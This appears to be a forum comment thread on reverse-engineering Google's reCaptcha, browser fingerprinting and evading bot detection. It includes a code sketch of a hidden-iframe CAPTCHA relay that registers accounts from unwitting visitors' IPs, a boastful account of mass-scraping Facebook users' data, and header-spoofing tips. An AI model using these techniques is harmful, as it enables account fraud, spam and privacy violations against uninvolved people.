When I was a fifteen-year-old "internet marketer" I was able to create 60,000 Google accounts from residential IPs, despite Google's CAPTCHA system. As a fifteen-year-old kid, that's when I knew Google was not an invincible company.
The trick was that Google's backend registration logic did not validate the referrer of the signup form, or check that the submitting IP address matched the one that downloaded the CAPTCHA. So I cloned the form on my own server and loaded it in an invisible iframe with all fields filled except the CAPTCHA. Then I served the CAPTCHA to the user, who solved it and clicked "submit", and the entire hidden form in the iframe was submitted, registering a Google account with the visitor's IP.
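A minimal sketch of what that kind of relay page looks like (illustrative only; the URLs, field names, and CAPTCHA endpoint below are hypothetical stand-ins, not the actual Google signup parameters):

```html
<!-- Hypothetical relay page. The visitor sees only a CAPTCHA; a cloned,
     pre-filled copy of the signup form sits in a hidden iframe on the same
     origin, so the parent page can reach into it. All names/URLs are made up. -->
<iframe src="/cloned-signup.html" name="signup"
        style="position:absolute; width:0; height:0; border:0;"></iframe>

<!-- The CAPTCHA image is proxied from the real signup flow and shown here. -->
<img src="/captcha-proxy?session=abc123">
<input id="captcha-answer" type="text">
<button onclick="relay()">Submit</button>

<script>
  // Copy the visitor's CAPTCHA answer into the hidden, pre-filled form and
  // submit it. The registration request then originates from the visitor's
  // own (residential) IP address rather than the attacker's server.
  function relay() {
    var frame = window.frames['signup'];
    var form = frame.document.getElementById('signup-form');
    form.elements['captcha'].value =
        document.getElementById('captcha-answer').value;
    form.submit();
  }
</script>
```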
I was surprised that worked, because it was a huge vulnerability. Nowadays I would go for the bug bounty, but back then I tried to sell it for $5k -- unfortunately nobody believed I could do it, and I couldn't prove it without revealing the method, so I ended up unable to take advantage of it.
I did have about 60k accounts from random page views on blogspot blogs, but I never did anything with them. Perhaps that was the only time my inability to finish projects ironically saved me from some trouble. :)
You probably wouldn't have gotten into much trouble: just a C&D, probably being asked to fork over some money from your profits and to sign a contract with Google saying you'll never do it again (and "your" Google accounts disabled). ;)
At least that's what happened with me and my friend when we mined about 1/10th of Facebook's users, crowdsourced a bunch of info from people by searching names, and made it public (we had a pseudo-anonymous, no-login messaging feature where people would share information that makes you question what privacy even means when n-1 people are divulging everything about you). If I wasn't a US citizen, I'd probably do it better now that I know more about what I'm up against. Maybe the landscape will be more open in the US in the future.
People moan on and on about Facebook and companies like them as if they are all-powerful (they can seem that way if you play by their rules and submit to their jurisdiction for pragmatic reasons), but by challenging those assumptions, leveraging user behavior, and arbitraging legalities, one can probably crack some pretty big holes...
I received an email from Google requesting the following:
> The code you reversed is used to protect many sites’ registration process including Google and many others. We are concerned that having your code and analysis publicly available will make it easier to build registration automation tools which will result in a surge of spam in all the services protected by this code and will affect negatively many Internet users.
> This is why we kindly ask you to temporarily remove it from GitHub so your work won’t be used for a malicious purpose which we believe was never your intended goal.
As I wasn't aware that the botguard was also used for this purpose (separately from reCaptcha, in Gmail and other services) before publishing my code, I removed the GitHub repository for now. I'm sorry for honest security enthusiasts who didn't read the article, but I don't want to cause harm.
Google also invited me to visit their offices to discuss my work.
Considering that this was done using information also available to malicious parties, is now "out there" even if you take it down yourself, and is just a security-by-obscurity scheme, it does leave a bad aftertaste in my mouth.
Google is essentially trying to run code on a user's computer without wanting anyone to know what it's running there, while doing nothing that stops the "bad guys" from doing their own analysis without publishing it. I'm not saying that they're trying to do anything evil, but it strikes all the wrong notes for me when they try to suppress information about a system they should have known is wide open to analysis.
That's a bit strange; usually Google will just make changes that invalidate your analysis (and they can definitely make changes rather quickly). In other words, by reacting this way they're basically saying "we rely on security through obscurity". I was almost expecting a "you remove it, or we'll remove your site from our search results." The fact that it's a tracking script might have something to do with it...
I had forked your repository, but after reading this I decided to remove it too.
I think reCaptcha is overused by services that should be publicly available for automation, especially in Brazil. That is a bad use case for reCaptcha or any other captcha system.
But I also understand that the majority of reCaptcha users are fighting spam, and a public description of their JavaScript engine could really hurt the Internet.
So in other words, it's a tracking script also serving as a captcha.
"Google servers will receive and process, at least, the following information:
Plug-ins
User-agent
Screen resolution
Execution time, timezone
Number of click/keyboard/touch actions in the <iframe> of the captcha
It tests the behavior of many browser-specific functions and CSS rules
It checks the rendering of canvas elements
Likely cookies server-side (it's executed on the www.google.com domain)
And likely other stuff...
"
At least the old captcha was a simpler image.
Some of this data is readily available in the user-agent string. The rest does require some JS execution and sending the results back, though. Check this out: https://valve.github.io/fingerprintjs/
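As a rough illustration of how a few of the signals in that list get collected in the browser (a minimal sketch, not fingerprintjs's or Google's actual code; the reporting step is omitted):

```javascript
// Illustrative only: gather a handful of the fingerprinting signals listed above.
function collectSignals() {
  // Canvas rendering differs subtly across engines, OSes and font stacks.
  var canvas = document.createElement('canvas');
  var ctx = canvas.getContext('2d');
  ctx.font = '16px Arial';
  ctx.fillText('fingerprint probe', 2, 20);

  return {
    userAgent: navigator.userAgent,
    plugins: Array.prototype.map.call(navigator.plugins, function (p) { return p.name; }),
    screen: screen.width + 'x' + screen.height + 'x' + screen.colorDepth,
    timezoneOffset: new Date().getTimezoneOffset(),
    canvas: canvas.toDataURL()
  };
}

// In a real tracker the object would be serialized, hashed and sent back
// (e.g. via an <img> beacon or XMLHttpRequest); here we just log it.
console.log(JSON.stringify(collectSignals()));
```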
Until there's a significant number of people doing the same thing, you're simply "that guy in <insert geoip lookup city here> with the randomized UA", and you're infinitely more fingerprintable than just about anybody else on the internet. Go to EFF's Panopticlick to see how unique your fingerprint is. Using an iPad with up-to-date software gets me the same fingerprint as about 18,000 other people in my GeoIP region; I haven't been able to do better than that yet.
If your other browser properties don't match the UA, though, you're still showing up as a unique fingerprint. You'll be the guy with an IE8 UA sending an Accept: image/webp header, or the guy with a Safari UA who's following link-prefetching instructions that are only valid in Chrome, or something else that makes you unique.
Or my personal favourite: sending the Do Not Track header, something that only a small number of people send and that makes you much easier to fingerprint.
The combination of UA and Accept headers needs to be changed in sync. Good point - are there any other things like that to watch out for?
And DNT is currently at around ~8%, so, although it does leak some information, it doesn't leak an absurd amount (~3.6 bits). (That's using data from here [1], which is FF-only. If you have a better source of data for this, please let me know.)
Any number of things can out you as a fake. Whether or not the request's Accept-Encoding has sdch can help you figure out whether something is Chrome.
You can also abuse parsing quirks to figure out which rendering engine is being used, or just try to use request-generating features that shouldn't be present in whatever browser you're claiming to be (<svg>, <video>, styling on engine-specific pseudo-elements, etc.)
Here's an example[1] using just HTML+CSS that will request a different image depending on whether you use a WebKit or Gecko derivative. If you use neither, no image will be requested. Someone who says they're Chrome but requests Firefox's image is immediately outed as a liar.
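Something in the same spirit, as a sketch (this is not the linked example; it relies on engines of that era dropping any rule whose selector list contains a pseudo-element they don't recognise, and the probe URLs are made up):

```html
<!-- Gecko doesn't know ::-webkit-scrollbar-corner and drops that whole rule;
     WebKit/Blink doesn't know ::-moz-focus-inner and drops the other one.
     So each engine requests only "its" image, whatever the UA string claims. -->
<style>
  .probe, ::-webkit-scrollbar-corner { background-image: url('/probe?engine=webkit'); }
  .probe, ::-moz-focus-inner        { background-image: url('/probe?engine=gecko'); }
</style>
<div class="probe" style="width:1px; height:1px;"></div>
```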
I believe Mario Heiderich also posted some stuff using WebKit's styleable scrollbars that could be used for fingerprinting screen sizes and how large certain elements are when rendered.
The list goes on, but my point is that fingerprinting at the rendering / layout engine level is trivial, so you're better off being legitimately ordinary if you're worried about fingerprinting.
Are your headers in the correct order for the given UA?
Correct capitalisation for the given UA?
Correct accept for the given UA?
Correct white space around or between values for the given UA?
It is far better to appear the same as everyone else if you want to be anonymous (e.g. to browse on an iPad) than it is to do anything to try and not be tracked.
Anonymity today means being invisible within the crowd, not standing out as the only sheep that has been shorn.
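A rough sketch of automating the header checks a few comments up, on the server side (Node here; the "expected" Chrome profile below is a made-up placeholder, and real checks would be derived from traffic captured from genuine browsers):

```javascript
// Compare the order and capitalisation of incoming headers against what a
// genuine browser with the claimed User-Agent would send. Illustrative only.
var http = require('http');

// Placeholder profile; a real one would come from captured Chrome traffic.
var expectedChromeOrder = ['Host', 'Connection', 'Accept', 'User-Agent',
                           'Accept-Encoding', 'Accept-Language'];

http.createServer(function (req, res) {
  // req.rawHeaders preserves original order and casing: [name, value, name, value, ...]
  var names = req.rawHeaders.filter(function (_, i) { return i % 2 === 0; });

  var claimsChrome = /Chrome/.test(req.headers['user-agent'] || '');
  var orderMatches = expectedChromeOrder.every(function (name, i) {
    return names[i] === name;
  });

  if (claimsChrome && !orderMatches) {
    console.log('UA claims Chrome, but header order/casing looks off:', names);
  }
  res.end('ok');
}).listen(8080);
```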
In Bulgaria, we had a joke about our communist leader Todor Zhivkov, who had supposedly been hiding from the fascists in the forests. The joke was that he was hiding... but nobody was looking for him, because he hadn't done anything to get their attention. Anyway, trying to "hide" is security by obscurity. It's like making your defense hiding your SSN on your own computer, when other, weaker systems can already be exploited and your SSN stolen from them. Whatever you have to hide is already kept somewhere else in most cases. Instead, find a defense strategy that does not depend on obscurity - that is the only real defense.
At the end of the day only google.com cookies make sense; everything else can be routinely faked, just as the author says: "Programmatically bypass the captcha by simply executing a rendering engine and automating movements of the mouse." What was Google trying to hide? They seem to have put a lot of effort into it.
It's enough information to come up with a unique fingerprint without using cookies.
With that fingerprint they can track your habits across multiple domains. Bots can look like browsers, but they can't necessarily browse the internet the same way a human can.
What habits? There's nothing else Google can see here; they only track movements inside the reCaptcha iframe. They have zero information about how you browse the web.
They have all your interaction with every Google property, tied to your account when you're logged in and semi-persistent pseudonymous identities when you are not. They have the clickstream data between every google property (most notably, Search) and the rest of your web experience, which can (fairly easily) reveal many websites you visit. They have ga.js or AdSense tracking code running on double-digit percentages of all pages on the Internet.
If asked to, Google could provide you with as accurate a record of my flights between Japan and the US as either nation's customs agency could, simply by looking at a time series of IP addresses. Their data got radically more accurate a few years ago when I started using Google Maps with the location permission turned on.
For added giggles, Google is a SQL join away from associating my extraordinarily-well-established-but-weakly-verified Internet identity with unique identifiers like e.g. my social security number. That would probably make someone in the Borg hesitate for a few minutes, but clearly they're OK with saying "At scale, we know the huge class of people which happens to include Patrick -- who we know intimately but prefer to avoid acknowledging that fact in social settings -- is identifiable by a vector of features, and a machine can very quickly cluster a random Internet user with Patrick versus with Spammy McSpamsalot. We can thereby organize data about this person to serve their needs better, for example by giving them access to resources only for trusted people, like captcha-free whatevers. Bonus: this is one more reason why it is fun and convenient to invite Google into even more areas of their life! It's a win-win!"
I probably didn't make it clear: the reCaptcha iframe provides zero useful information about how you browse the web. Of course other Google services such as Analytics and Chrome collect more than enough about your habits. But I don't buy "mouse tracking" inside a 200x400 iframe; that's nonsense.
The new system is incredibly cumbersome when you have to type the captcha. It went from 2 key presses to 5 (plus actually typing the text of course). Obviously if you just need to tick it everything is fine, but for me the tick works ~5% of the time.
It's similar to when malware authors pack and encode their stuff.
At the end of the day, it does not stop a determined individual from reverse engineering the code (and then publishing the technique).
BUT it does make it more difficult to understand, work with, etc. It simply reduces the number of individuals who have the skills necessary to follow everything though.
It will deter the less skilled people from attempting to "hack" the system....
> It will deter the less skilled people from attempting to "hack" the system....
... especially if slight changes are made. Google could change the smallest thing and run the lot back through their mangler, and the attacker would have to go through the process of de-obfuscating it all over again.
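As a toy illustration of what one pass through that kind of mangler does (hand-written example; it has nothing to do with Google's actual obfuscator):

```javascript
// Before: the intent is obvious at a glance.
function checkTimezoneOffset() {
  return new Date().getTimezoneOffset();
}

// After one mangling pass: same behaviour, but the name is gone and the
// property lookup goes through an encoded string table. The next pass can
// emit different identifiers and a reshuffled table, so any notes keyed to
// "_0x3f2a" or the array layout have to be redone from scratch.
var _0x3f2a = ['\x67\x65\x74\x54\x69\x6d\x65\x7a\x6f\x6e\x65\x4f\x66\x66\x73\x65\x74'];
function _0x51c7() {
  return new Date()[_0x3f2a[0]]();
}
```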